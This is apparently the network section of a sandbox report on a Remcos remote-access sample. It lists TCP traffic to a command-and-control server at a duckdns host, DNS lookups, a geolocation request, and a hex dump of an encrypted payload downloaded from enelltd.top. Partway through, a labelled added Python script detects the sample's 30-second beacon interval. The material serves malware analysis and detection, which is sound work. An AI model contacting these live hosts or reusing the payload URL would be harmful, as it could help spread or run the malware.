                                                    May 3, 2024 09:43:55.343686104 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343785048 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343823910 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.343861103 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343934059 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.343975067 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344038010 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344110012 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344151020 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344219923 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344312906 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344356060 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344357967 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344413996 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344451904 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344470978 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344484091 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344518900 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.344558001 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344629049 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.344665051 CEST4974029871192.168.2.4193.222.96.21
                                                    May 3, 2024 09:43:55.345040083 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345154047 CEST2987149740193.222.96.21192.168.2.4
                                                    May 3, 2024 09:43:55.345237017 CEST4974029871192.168.2.4193.222.96.21
May 3, 2024 09:43:55.345247030 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.345354080 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.345402002 CEST  49740  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:43:55.345506907 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.345612049 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.345652103 CEST  49740  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:43:55.345778942 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.345885038 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.345927000 CEST  49740  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:43:55.345973969 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.346067905 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.346107960 CEST  49740  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:43:55.346132040 CEST  29871  49740  193.222.96.21  192.168.2.4
May 3, 2024 09:43:55.400783062 CEST  49740  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:43:55.430144072 CEST  80     49741  178.237.33.50  192.168.2.4
May 3, 2024 09:43:55.430200100 CEST  49741  80     192.168.2.4    178.237.33.50
May 3, 2024 09:44:25.032540083 CEST  29871  49739  193.222.96.21  192.168.2.4
May 3, 2024 09:44:25.135230064 CEST  49739  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:44:26.366244078 CEST  49739  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:44:26.583239079 CEST  29871  49739  193.222.96.21  192.168.2.4
May 3, 2024 09:44:57.206052065 CEST  29871  49739  193.222.96.21  192.168.2.4
May 3, 2024 09:44:57.260282993 CEST  49739  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:44:57.355274916 CEST  49739  29871  192.168.2.4    193.222.96.21
May 3, 2024 09:44:57.586834908 CEST  29871  49739  193.222.96.21  192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
May 3, 2024 09:43:49.102766037 CEST  51669        53         192.168.2.4  1.1.1.1
May 3, 2024 09:43:49.197503090 CEST  53           51669      1.1.1.1      192.168.2.4
May 3, 2024 09:43:53.027424097 CEST  65282        53         192.168.2.4  1.1.1.1
May 3, 2024 09:43:53.129843950 CEST  53           65282      1.1.1.1      192.168.2.4
May 3, 2024 09:43:53.999231100 CEST  60206        53         192.168.2.4  1.1.1.1
May 3, 2024 09:43:54.088813066 CEST  53           60206      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
May 3, 2024 09:43:49.102766037 CEST  192.168.2.4  1.1.1.1  0xe42f    Standard query (0)  enelltd.top                A (IP address)  IN (0x0001)  false
May 3, 2024 09:43:53.027424097 CEST  192.168.2.4  1.1.1.1  0xf818    Standard query (0)  learfo55ozj02.duckdns.org  A (IP address)  IN (0x0001)  false
May 3, 2024 09:43:53.999231100 CEST  192.168.2.4  1.1.1.1  0x3d91    Standard query (0)  geoplugin.net              A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address        Type            Class        DNS over HTTPS
May 3, 2024 09:43:49.197503090 CEST  1.1.1.1    192.168.2.4  0xe42f    No error (0)  enelltd.top                       172.67.215.46  A (IP address)  IN (0x0001)  false
May 3, 2024 09:43:49.197503090 CEST  1.1.1.1    192.168.2.4  0xe42f    No error (0)  enelltd.top                       104.21.45.139  A (IP address)  IN (0x0001)  false
May 3, 2024 09:43:53.129843950 CEST  1.1.1.1    192.168.2.4  0xf818    No error (0)  learfo55ozj02.duckdns.org         193.222.96.21  A (IP address)  IN (0x0001)  false
May 3, 2024 09:43:54.088813066 CEST  1.1.1.1    192.168.2.4  0x3d91    No error (0)  geoplugin.net                     178.237.33.50  A (IP address)  IN (0x0001)  false
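The DNS answer for learfo55ozj02.duckdns.org (193.222.96.21) and the TCP rows above are enough to see the Remcos check-in cadence: the sample reconnects to port 29871 roughly every 30 seconds, each time from a fresh client port. The following is an added example and not part of the Joe Sandbox report. It groups the report's packet rows by remote endpoint regardless of direction, splits each endpoint's packets into bursts, and flags endpoints whose bursts recur at a steady interval, naming them through the DNS answers. The rows and the IP-to-name map are constructed from the tables above; the 5-second burst gap, the three-burst minimum and the 50 % jitter bound are assumptions chosen for this capture.

```python
"""Beacon-interval check over the TCP packet rows of a sandbox report.

Added example (not part of the Joe Sandbox report): find remote endpoints the
sample contacts at a regular cadence and map the IP back to the resolved name.
"""
from datetime import datetime
from statistics import median

# Constructed from the report's TCP table: (timestamp, src port, dst port, src IP, dst IP).
# Only the 193.222.96.21:29871 flows and the geoplugin.net exchange are reproduced.
ROWS = [
    ("May 3, 2024 09:43:55.345247030", 29871, 49740, "193.222.96.21", "192.168.2.4"),
    ("May 3, 2024 09:43:55.345402002", 49740, 29871, "192.168.2.4", "193.222.96.21"),
    ("May 3, 2024 09:43:55.400783062", 49740, 29871, "192.168.2.4", "193.222.96.21"),
    ("May 3, 2024 09:43:55.430144072", 80, 49741, "178.237.33.50", "192.168.2.4"),
    ("May 3, 2024 09:43:55.430200100", 49741, 80, "192.168.2.4", "178.237.33.50"),
    ("May 3, 2024 09:44:25.032540083", 29871, 49739, "193.222.96.21", "192.168.2.4"),
    ("May 3, 2024 09:44:25.135230064", 49739, 29871, "192.168.2.4", "193.222.96.21"),
    ("May 3, 2024 09:44:26.366244078", 49739, 29871, "192.168.2.4", "193.222.96.21"),
    ("May 3, 2024 09:44:26.583239079", 29871, 49739, "193.222.96.21", "192.168.2.4"),
    ("May 3, 2024 09:44:57.206052065", 29871, 49739, "193.222.96.21", "192.168.2.4"),
    ("May 3, 2024 09:44:57.260282993", 49739, 29871, "192.168.2.4", "193.222.96.21"),
    ("May 3, 2024 09:44:57.355274916", 49739, 29871, "192.168.2.4", "193.222.96.21"),
    ("May 3, 2024 09:44:57.586834908", 29871, 49739, "193.222.96.21", "192.168.2.4"),
]

# Constructed from the report's DNS answers.
DNS_ANSWERS = {
    "193.222.96.21": "learfo55ozj02.duckdns.org",
    "178.237.33.50": "geoplugin.net",
    "172.67.215.46": "enelltd.top",
}
LOCAL_IP = "192.168.2.4"  # the analysis VM


def parse_ts(text):
    """Parse 'May 3, 2024 09:43:55.345247030' into a datetime.

    strptime's %f accepts at most six fraction digits, so the nanoseconds are
    truncated to microseconds; that is far finer than beacon intervals need.
    """
    head, frac = text.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def group_by_remote(rows, local_ip=LOCAL_IP):
    """Collect packet timestamps per remote (ip, port), whichever way the packet went.

    Keying on the remote side merges reconnects that use a new client port each time.
    """
    flows = {}
    for ts, sport, dport, sip, dip in rows:
        remote = (dip, dport) if sip == local_ip else (sip, sport)
        flows.setdefault(remote, []).append(parse_ts(ts))
    return flows


def split_bursts(times, gap_seconds=5.0):
    """Split timestamps into bursts separated by more than gap_seconds of silence (assumed gap)."""
    times = sorted(times)
    bursts = [[times[0]]]
    for t in times[1:]:
        if (t - bursts[-1][-1]).total_seconds() > gap_seconds:
            bursts.append([t])
        else:
            bursts[-1].append(t)
    return bursts


def beacon_candidates(rows, min_bursts=3, max_jitter=0.5):
    """Return remotes whose bursts recur at a regular interval.

    Jitter is the largest deviation of any interval from the median interval,
    as a fraction of that median; 0.5 is an assumed, deliberately loose bound.
    """
    found = []
    for remote, times in group_by_remote(rows).items():
        bursts = split_bursts(times)
        if len(bursts) < min_bursts:
            continue
        starts = [b[0] for b in bursts]
        intervals = [(later - earlier).total_seconds() for earlier, later in zip(starts, starts[1:])]
        mid = median(intervals)
        jitter = max(abs(i - mid) for i in intervals) / mid
        if jitter <= max_jitter:
            found.append({
                "remote": remote,
                "domain": DNS_ANSWERS.get(remote[0]),
                "bursts": len(bursts),
                "median_interval": round(mid, 3),
                "jitter": round(jitter, 3),
            })
    return found


if __name__ == "__main__":
    for hit in beacon_candidates(ROWS):
        print(hit)
```

On this capture the only candidate is 193.222.96.21:29871 with a median interval just under 31 seconds and about 4 % jitter; the geoplugin.net exchange is a single burst and drops out. Three bursts is the least that yields two intervals to compare, so on a longer capture the jitter bound would be tightened and the result joined against the DNS log, as done here with DNS_ANSWERS, so that the alert names the duckdns host rather than a bare IP.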
                                                    • enelltd.top
                                                    • geoplugin.net
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49741        178.237.33.50   80                6544  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp                            Bytes transferred  Direction  Data
May 3, 2024 09:43:54.257086992 CEST  71                 OUT        GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
May 3, 2024 09:43:54.430488110 CEST  1173               IN         HTTP/1.1 200 OK
                                                    date: Fri, 03 May 2024 07:43:54 GMT
                                                    server: Apache
                                                    content-length: 965
                                                    content-type: application/json; charset=utf-8
                                                    cache-control: public, max-age=300
                                                    access-control-allow-origin: *
                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                    Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49738        172.67.215.46   443               6544  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp                Bytes transferred  Direction  Data
2024-05-03 07:43:49 UTC  177                OUT        GET /XpMumnKrmZynRk242.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: enelltd.top
Cache-Control: no-cache
2024-05-03 07:43:49 UTC  845                IN         HTTP/1.1 200 OK
                                                    Date: Fri, 03 May 2024 07:43:49 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 494656
                                                    Connection: close
                                                    Last-Modified: Thu, 02 May 2024 12:12:55 GMT
                                                    ETag: "66338347-78c40"
                                                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                    Cache-Control: max-age=315360000
                                                    CF-Cache-Status: HIT
                                                    Age: 66005
                                                    Accept-Ranges: bytes
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QRCxNyy3%2BHvmMUSfupOiywGWGzJOuhj6D%2BtLdwCZq0jq%2FKwDR2hNdjqbpMp9WN8U55oHa1ivpK%2BLUXT1%2FlPQAQ3TUuEsyB8VMMvWfW1hCYluMXzPNOjwMTt10u6J3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                    X-Content-Type-Options: nosniff
                                                    Server: cloudflare
                                                    CF-RAY: 87de9f4f0c251a3c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-03 07:43:49 UTC524INData Raw: 44 db e4 aa d7 31 2e 25 b7 8e e2 cf e4 69 3e 7b 32 bc f4 12 1a 10 fb b6 7d 1b 73 4d fe dd 77 6d de 33 36 65 38 20 22 10 3e 54 c2 0f 1d 5b 58 47 9e 8b cf c9 15 2b 7d 19 20 6e eb 99 6f 71 5a ce 89 33 9f 63 b4 2b 0b c5 a5 40 dd c0 22 8f ba d4 27 84 bd 52 3d 21 d8 7a 28 5a 52 6b 56 e0 d5 4c f6 47 77 78 e4 50 f3 cc 22 72 26 fd 59 f2 45 2b 9b dd f2 83 87 33 c1 17 f4 ba 11 a3 d0 2e a2 ae f3 1e 69 ff ad a1 61 88 5d 96 63 89 80 2a 1f 77 31 3f 73 12 c3 10 0e d8 ef 99 96 df f8 b8 cb 47 52 0c 7d 54 3e 1b 29 7e 1b 2d 53 09 ed c1 5f d7 02 67 11 3e 2e 7a 30 04 4e f2 fc dd 74 fb e1 a1 7a 0e a1 77 93 54 08 c7 91 bf 3e fe 81 7b 80 fd 8f 6a d0 8e be 0f 58 41 ba 1b be c8 43 a8 84 38 1c e4 37 38 5d fd ae f8 c4 8f 5e a6 b7 b5 1c 67 85 6f a9 8b d7 b8 aa 36 76 6a 2a 58 55 7f 95
                                                    Data Ascii: D1.%i>{2}sMwm36e8 ">T[XG+} noqZ3c+@"'R=!z(ZRkVLGwxP"r&YE+3.ia]c*w1?sGR}T>)~-S_g>.z0NtzwT>{jXAC878]^go6vj*XU
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 05 35 ad b7 e8 f0 48 bf c0 b7 14 16 32 d0 f0 bb f2 73 4d 85 13 44 d7 f9 b7 b7 3d 91 42 07 e9 95 fb 2b 45 eb d5 e7 e5 b1 3f 2d 5e 96 97 6b bf 84 90 78 d3 09 42 03 4a 18 84 c6 e8 06 81 39 e6 f7 9f dd cf 55 5a 16 54 eb 02 a3 f8 b0 bf 5e 23 ee 6c 5c e8 54 38 f9 74 51 da cf 30 30 c7 98 e8 d5 4a 9c 91 56 2f 76 64 e8 8e 49 10 e4 0c b3 ef 2e b5 1f de 42 dc 48 df ac 7c 0a ec ad 76 1c 00 22 62 0a ad ad 96 6f 01 3b 9d da 18 8e 25 c2 21 1f 71 6e 52 54 c8 0b dc 09 33 ab cc 82 38 43 50 79 e8 bd 6d 19 ec 16 6d f6 74 2e fd 85 61 03 e9 00 28 6e c5 50 65 5b f0 9d 5e 23 56 b0 61 84 da ab 1b cc e8 37 9e f2 99 f2 48 03 04 69 70 05 57 88 38 e6 14 c9 62 77 1c cc 74 80 c8 d1 99 b0 91 93 f6 b2 40 8a cb 48 ef 59 aa be 9b b1 da 94 10 74 ab 80 73 d9 64 2c 6c 06 b7 17 bc 3c 47 74 e7
                                                    Data Ascii: 5H2sMD=B+E?-^kxBJ9UZT^#l\T8tQ00JV/vdI.BH|v"bo;%!qnRT38CPymmt.a(nPe[^#Va7HipW8bwt@HYtsd,l<Gt
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 25 bf 92 73 5c c5 35 2e ca b8 7f 4e 2a 54 19 02 60 93 4d 49 de 85 3f 16 d2 71 2b 64 9e 48 8b 22 50 13 47 a4 6b f9 9a 7f 3c 94 5a dc 55 5f d6 f7 a2 06 ce 7b e0 1c 05 b8 dd 6d 0d 03 0e 96 80 1b 67 59 57 eb ff f3 02 e5 21 47 e2 28 a5 1b 6d 46 e8 4e f0 be 50 0d 3b f2 99 c6 e3 99 bc 6b dc f9 05 35 c5 76 bc 66 4e 57 07 84 17 16 13 c0 4f a3 e4 34 4d 6d 51 49 d7 f9 df 7c bd d4 42 7f 25 a6 04 2f 1c 28 3c 88 de b0 3f 47 5e 2f a7 3d f8 84 78 45 e0 09 42 6b 9f 98 c1 c6 00 aa 9c 4e 83 d6 28 b7 cf ec 7f 3f 16 eb ea 96 cb b0 bf 44 f9 6e 29 58 00 c0 0b fa 74 08 19 76 d0 66 80 98 00 97 19 9d 91 5e e8 84 45 89 12 56 23 e7 ba 93 2d 97 2d d8 9c 42 34 1e ad ad 7c 14 1a 2d 33 1c e8 4a 51 09 ad f4 55 07 31 f3 9b da 70 8e c3 e0 40 94 05 1e c0 11 8c 06 23 1c 8f 29 8e 82 9b d9 07
                                                    Data Ascii: %s\5.N*T`MI?q+dH"PGk<ZU_{mgYW!G(mFNP;k5vfNWO4MmQI|B%/(<?G^/=xEBkN(?Dn)Xtvf^EV#--B4|-3JQU1p@#)
                                                    2024-05-03 07:43:49 UTC1369INData Raw: ad 70 fc da ed 8c 17 6c 35 1f f4 6d 37 cd 8f 84 a2 b0 5d 04 65 e2 53 ca 26 3e 1e ee 0e 5c 42 bd 81 f3 b6 9d 78 c2 de 33 c9 45 fd f9 0d 1c 1f 74 60 5f 9f f0 02 3d ba ee c9 be f2 e7 5e aa 3f 5b e4 a7 5e 9f da 64 46 2c 9b d6 f8 64 71 36 9e f5 4e d7 8b 1c bf 62 32 92 ef d9 20 ff 95 69 aa e9 24 58 4c 09 5d c5 5d 37 77 79 55 e1 11 61 6f 0c b2 9f 1c 98 bf c2 3f ad b3 69 2f f7 b3 eb f4 52 84 90 25 90 d1 a1 8e fb 85 04 56 9e 55 b7 0e 44 42 48 e1 d6 ed d5 21 84 d2 59 0e 55 3d 75 15 6e ca 49 90 ab ff 1b da 80 4b 55 e2 37 0f 19 6d 23 93 59 23 be 09 ce b9 8c 27 5e b6 8e ea 39 34 87 42 35 20 3b 18 9b 4e bf d8 5f f1 03 4a 03 af 30 62 fe c1 a1 8f 44 d7 f9 5f f1 28 91 42 ce 67 45 8a a3 61 6b d5 e7 e5 59 99 38 5e 96 ce e0 6f 09 dc 5c b7 e1 69 16 4a 18 dd 4d 38 8b e3 69 cb
                                                    Data Ascii: pl5m7]eS&>\Bx3Et`_=^?[^dF,dq6Nb2 i$XL]]7wyUao?i/R%VUDBH!YU=unIKU7m#Y#'^94B5 ;N_J0bD_(BgEakY8^o\iJM8i
                                                    2024-05-03 07:43:49 UTC1369INData Raw: fe 4f 44 55 77 1d 53 03 9c 42 7f c5 df ea ec cf 1e 84 40 a6 da ed 68 9b 89 0c 1a c5 f7 a0 45 2b 00 14 1c 1e 50 7c a4 f2 95 09 0f e7 13 c3 48 7d 71 77 b7 42 f2 e4 7a a5 e3 94 b0 99 f4 2a 23 3a 63 fe 52 ab 5f 48 1b 98 94 a8 4c 7a 1a 06 33 29 2d b5 4a 52 89 6e 78 42 24 98 d3 c2 8e 7a 7a 0e 94 8a d0 9d 4e 43 6b 18 ee b7 5e 55 c8 cf 8f d5 03 e2 a2 31 a5 b6 3b 74 09 40 09 7a 1d b4 89 da a6 e3 dd 0b a8 a9 99 6d bd f9 d5 21 4a 97 86 17 d4 99 12 f3 6a 0d 4e ff ed 5e 7d 0b 2b b8 ed c3 e4 89 76 9c da 56 01 78 e1 c5 18 fd b8 f4 9a 7e e3 17 a4 a2 bc ae db 4c 69 a3 21 47 52 5c 6c 01 cd db 92 7a 5c 94 0e e1 1d 74 1a 56 af 38 57 45 39 db 3a 41 16 c0 3f fe 1d 94 dd 66 f6 eb 8f a7 24 d9 e1 f5 94 f9 92 37 4b 04 8e 99 55 b7 d5 f2 4a 6f b7 d6 60 00 8e 9e 3a 30 0c 03 57 d6 ea
                                                    Data Ascii: ODUwSB@hE+P|H}qwBz*#:cR_HLz3)-JRnxB$zzNCk^U1;t@zm!JjN^}+vVx~Li!GR\lz\tV8WE9:A?f$7KUJo`:0W
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 69 03 15 dd 5c 4c 00 37 e7 28 e2 d6 aa e0 3d 65 12 19 4d 6c 22 2c 1f ba f6 e2 93 93 46 44 35 5a 8a 66 eb 09 90 f7 fe 53 41 26 b6 c1 82 17 01 22 8b ab 6a 6a 9e 48 e7 a5 24 fe 35 ee 2b ba 14 03 0d 8d be ab 9b c1 09 0f 1a 7e 7d b4 8d 2b 70 75 51 ad ae 16 08 88 1d 46 0b 5e 2b 0d 4e e5 8e 26 01 b0 42 d1 bb 5a b6 f5 9d c1 59 48 18 01 14 bd f9 7a bf 2d af ee b2 34 18 79 2d b1 aa 5e ba 1c 76 fb 9e ea 05 83 91 b9 ea 4e 84 d7 6c 87 b6 38 f8 de 23 84 4b 1b 6d 63 bc c9 eb 31 d0 89 2b 6c 00 fa f3 39 fe fe 6f 9c 38 75 21 53 5d 06 1b 7d 84 c9 5a 13 0d 98 63 a6 8b c1 8d a9 5b be 06 89 18 a0 1c 75 66 9a 41 d6 aa 6c 5b 4b 49 75 fb 9b 37 e4 b5 88 69 9c 7c 2d a6 00 b1 ed aa 4b fb 15 46 ff be a3 23 67 d9 63 c9 68 ac f7 b6 65 2d 63 da fa 57 18 15 0e c5 ab 94 0d cd 07 b5 f0 65
                                                    Data Ascii: i\L7(=eMl",FD5ZfSA&"jjH$5+~}+puQF^+N&BZYHz-4y-^vNl8#Kmc1+l9o8u!S]}Zc[ufAl[KIu7i|-KF#gche-cWe
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 37 ae 63 ca 99 da 2b a0 4f 2d 09 c4 28 b7 e6 cc 9f e7 a6 4c 0a 81 0f 67 b7 2b c7 ad ed 1e 9b c0 35 ad 93 d7 9f 48 3e 2e 19 25 d8 29 e3 83 26 42 be 68 2c b3 09 7e 33 5c ec 22 ed 9a a9 b9 ce 87 a0 0d ba a0 50 56 02 6b ef ca 3e e8 f7 8a 2a d7 e4 23 fc d8 f9 b1 d2 1a af 27 a8 1e be 2a 62 93 1a 80 b2 f7 a4 48 53 62 3a 0b 4d a6 05 3b 8d 7a eb 8e 4d a3 d8 d3 e0 08 2e 1a 4f 9b f4 ac 0f d0 56 71 87 38 90 38 23 b3 99 74 3d 0e 81 c0 7c a1 50 eb e1 d5 69 16 e4 4a a8 b4 56 76 31 56 12 7f 36 0a 9a 08 73 37 04 ff a7 33 dd 55 47 95 0b 4c 53 ad ba 4a 65 74 65 4c 5d 8c b4 6e 95 0d 0f d8 7b b9 96 16 c6 f5 e5 37 95 42 97 04 6c 31 03 eb 52 0e ac f7 32 8d f2 24 76 78 59 3b 29 c5 7c 28 ae 60 be f8 43 7c 91 bb cf 5e e7 04 f8 78 23 3b b7 9e 23 de 59 1b 6d 65 bb ca 3b 16 89 4b af
                                                    Data Ascii: 7c+O-(Lg+5H>.%)&Bh,~3\"PVk>*#'*bHSb:M;zM.OVq88#t=|PiJVv1V6s73UGLSJeteL]n{7Bl1R2$vxY;)|(`C|^x#;#Yme;K
                                                    2024-05-03 07:43:49 UTC1369INData Raw: 06 02 8b ac 5b 1f f0 f9 4a 79 be 57 d2 4a b3 ee 65 3b 48 a6 ef f7 61 0c 6c 61 5f 3f 92 b7 31 b8 19 9d 5a b1 6c 45 81 7f c8 23 e4 f2 1a 74 bf 8c 8e 61 85 dc 3c ca 69 ae 8a 8b 78 0b 29 74 24 a3 99 cf b4 4e 7b ce f6 86 49 e3 cc aa 57 53 01 86 2d b0 08 dc 85 31 c1 2b 05 e1 d3 3e 14 df 77 0c 7e 5b 8b 8e 47 25 d4 2b 1e fe 55 e0 20 c5 bb 50 59 e3 4f ec c4 69 0f db 1d 81 a1 cf 62 cb 91 e4 d9 99 95 d4 9f 84 36 1e 19 25 31 56 68 5a 52 01 57 8a d7 b3 82 63 7b 90 04 b7 0c 33 a1 b6 2a 3f 5d f2 2f 2a f1 dc 0d f7 a3 3f 29 da 13 45 ee 20 04 23 60 aa fd b9 2c 0e 52 6a ab c6 b4 d1 a1 96 18 5d c0 c5 d3 a5 04 e9 7a 97 ff 5f 71 0b 3d 77 12 26 4d eb d3 d3 e0 ba 62 4d 48 3b cb cf f2 c1 1f 7b f3 08 54 ce 03 73 8b b8 d5 7b 9f 0d 03 56 bb 70 11 49 d4 60 e5 a5 50 65 f6 49 31 dc 1e
                                                    Data Ascii: [JyWJe;Hala_?1ZlE#ta<ix)t$N{IWS-1+>w~[G%+U PYOib6%1VhZRWc{3*?]/*?)E #`,Rj]z_q=w&MbMH;{Ts{VpI`PeI1
                                                    2024-05-03 07:43:49 UTC1369INData Raw: b6 e0 0d 43 f2 c9 c8 01 6e d1 af 35 4a 95 27 25 b9 73 4d be 8d 4b c5 7d 2b 28 9f 97 31 fe c5 ea 84 7b 31 72 45 1f 8c cf cf 3f f8 9e c4 fe d1 13 9c 18 b7 64 15 7c 4d 31 20 22 72 05 09 4f 0c b3 a7 8a cd 67 2e 71 84 6c d2 32 2b be 98 77 6a bf 0d 19 45 42 b6 9a 37 6b 22 34 ec 0d 2c c8 2e 37 10 ee 8e c6 5b 7c cb 11 05 5d 76 2d 2c bc 93 06 91 3f 48 a6 9b 69 de ca 10 45 4b 87 b1 a2 e2 94 67 2a 5a 35 e4 0b ca ca b2 1f fa d4 fd e8 c6 6e 8e ea 8a 28 5f 9d 50 ae 22 5e 43 73 cf 60 db bd bc 2c 28 ed 72 31 82 4b b7 0b 48 42 fb 27 de 66 31 27 53 34 f9 db 3e d4 fa c4 1f 38 9f 11 24 bd 78 aa 74 98 eb eb 5f f3 a7 23 a3 1f df 4e 8e b6 7d 68 6b 4e 80 4d 17 94 66 a0 0b 4e 71 6b 0e fb 17 7f 3c 68 9f 84 bd 79 79 05 cc 51 ab d3 16 4f 76 db 3e 3f dd 17 fc b6 0c a2 1e 33 dd f9 6a
                                                    Data Ascii: Cn5J'%sMK}+(1{1rE?d|M1 "rOg.ql2+wjEB7k"4,.7[|]v-,?HiEKg*Z5n(_P"^Cs`,(r1KHB'f1'S4>8$xt_#N}hkNMfNqk<hyyQOv>?3j
